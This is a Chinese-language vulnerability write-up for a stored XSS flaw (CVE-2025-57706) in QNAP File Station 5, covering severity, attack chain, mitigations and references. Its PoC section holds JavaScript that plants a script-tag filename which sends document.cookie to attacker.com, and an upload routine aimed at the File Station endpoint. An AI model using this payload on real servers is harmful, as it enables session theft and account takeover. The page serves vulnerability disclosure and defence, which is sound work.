CVE-2025-57706: QNAP File Station 5 存储型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-57706

漏洞类型

XSS (跨站脚本)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

QNAP File Station 5

漏洞概述

CVE-2025-57706是QNAP File Station 5中存在的一个存储型跨站脚本（Stored XSS）漏洞，CVSS评分为5.4，属于中等严重程度。该漏洞影响File Station 5的多个版本，攻击者可以通过该漏洞在应用程序中注入恶意JavaScript代码。当其他用户访问包含恶意脚本的页面时，这些脚本将在其浏览器上下文中执行，从而允许攻击者窃取会话令牌、劫持用户账户、读取敏感数据或执行其他恶意操作。漏洞的利用前提是攻击者需要拥有一个有效的用户账户，这降低了漏洞的直接利用风险，但结合社会工程学攻击或弱密码策略，仍可能造成严重的安全威胁。QNAP已于2025年披露该漏洞并发布了修复版本，建议所有使用受影响版本File Station 5的用户尽快升级到5.5.6.5018或更高版本以消除安全风险。

技术细节

该漏洞是一个存储型XSS漏洞，存在于File Station 5的文件管理功能中。攻击者首先需要拥有一个有效的用户账户，然后通过上传文件或创建文件夹等功能，在文件名、文件描述或其他可存储的字段中注入恶意JavaScript代码。由于应用程序未对用户输入进行充分的HTML转义或输入验证，恶意代码会被永久存储在服务器端。当其他用户通过Web界面浏览文件列表或访问相关功能时，存储的恶意脚本会被浏览器解析执行。攻击者可利用此漏洞窃取受害者的认证Cookie、会话令牌或其他敏感信息，进而实现账户劫持。攻击的成功取决于多个因素，包括浏览器的XSS过滤器状态以及应用程序的安全配置。攻击者通常需要诱导受害者访问特定页面或触发特定操作才能完成攻击链。修复方案包括对所有用户输入进行严格的输入验证和输出编码，使用Content-Security-Policy头部限制脚本执行，以及实现HttpOnly和Secure标志的Cookie保护机制。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标QNAP设备并确认运行File Station 5，通过端口扫描或服务探测确定版本号

STEP 2

Account Acquisition

攻击者通过暴力破解、凭证填充或社会工程学攻击获取一个有效的用户账户凭据

STEP 3

Payload Injection

利用File Station的文件上传或文件夹创建功能，在文件名或其他可存储字段中注入包含恶意JavaScript的XSS payload

STEP 4

Persistence

恶意脚本被永久存储在服务器数据库中，任何访问该文件列表的用户都会触发脚本执行

STEP 5

Social Engineering

攻击者诱导目标用户访问包含恶意脚本的File Station页面或触发特定操作

STEP 6

Execution & Exfiltration

受害者的浏览器执行恶意JavaScript代码，窃取Cookie、会话令牌或其他敏感信息并发送到攻击者控制的服务器

STEP 7

Account Takeover

攻击者利用窃取的凭证劫持受害者账户，进一步访问敏感数据或执行恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-57706 PoC - Stored XSS in QNAP File Station 5
// This PoC demonstrates how an authenticated attacker can inject malicious JavaScript
// through file upload functionality

// Step 1: Create a malicious filename containing XSS payload
const maliciousFilename = '<script>\n  fetch("https://attacker.com/steal?cookie=" + document.cookie)\n</script>';

// Step 2: Upload file with XSS payload as filename
async function exploitXSS() {
  const targetUrl = 'https://vulnerable-qnap-server/qwebfile/Upload'; // File Station upload endpoint
  
  const formData = new FormData();
  formData.append('Filename', maliciousFilename);
  formData.append('File', new Blob(['test content'], {type: 'text/plain'}), 'test.txt');
  
  try {
    const response = await fetch(targetUrl, {
      method: 'POST',
      credentials: 'include', // Include session cookies
      body: formData
    });
    
    console.log('XSS payload uploaded successfully');
    console.log('When other users view the file list, the script will execute');
  } catch (error) {
    console.error('Exploitation failed:', error);
  }
}

// Step 3: Social engineering to make victim visit the page
// The victim needs to access File Station file list page where the malicious filename is displayed

// Mitigation: Upgrade to File Station 5.5.6.5018 or later
// Or implement input sanitization and output encoding on the server side

影响范围

File Station 5 < 5.5.6.5018

防御指南

临时缓解措施

在无法立即升级的情况下，可采取以下临时缓解措施：1) 禁用不必要的用户账户，确保只有授权用户能访问File Station；2) 启用QNAP NAS的防火墙功能，限制对管理界面的访问；3) 监控File Station的访问日志，检测异常的请求模式；4) 警告用户不要点击来源不明的链接；5) 考虑使用Web应用防火墙(WAF)过滤恶意请求；6) 定期备份系统配置和数据，以便在发生安全事件时快速恢复。建议尽快完成版本升级以彻底消除该漏洞风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-57706
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-57706
3 Details https://www.cvedetails.com/cve/CVE-2025-57706/
4 VulDB https://vuldb.com/cve/CVE-2025-57706
5 Link https://www.qnap.com/en/security-advisory/qsa-25-38